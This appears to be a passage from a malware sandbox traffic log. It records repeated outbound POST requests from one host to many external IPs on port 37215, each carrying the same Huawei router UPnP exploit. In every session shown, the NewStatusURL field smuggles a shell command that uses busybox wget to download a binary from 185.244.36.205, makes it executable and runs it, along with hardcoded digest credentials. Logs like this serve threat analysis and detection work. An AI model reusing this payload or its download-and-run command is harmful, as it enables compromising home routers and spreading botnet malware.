                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              261192.168.2.1542278121.246.53.23537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205914974 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              262192.168.2.1547050121.115.236.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205931902 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              263192.168.2.1559128181.196.204.137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205979109 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              264192.168.2.1544674181.155.123.18437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206006050 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              265192.168.2.153565637.209.83.2737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206010103 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              266192.168.2.153947437.76.207.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206015110 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              267192.168.2.1541522122.13.236.20937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206016064 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              268192.168.2.154182894.242.4.16837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206067085 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              269192.168.2.155653894.198.214.23237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206068993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              270192.168.2.1556320138.92.198.12837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206127882 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
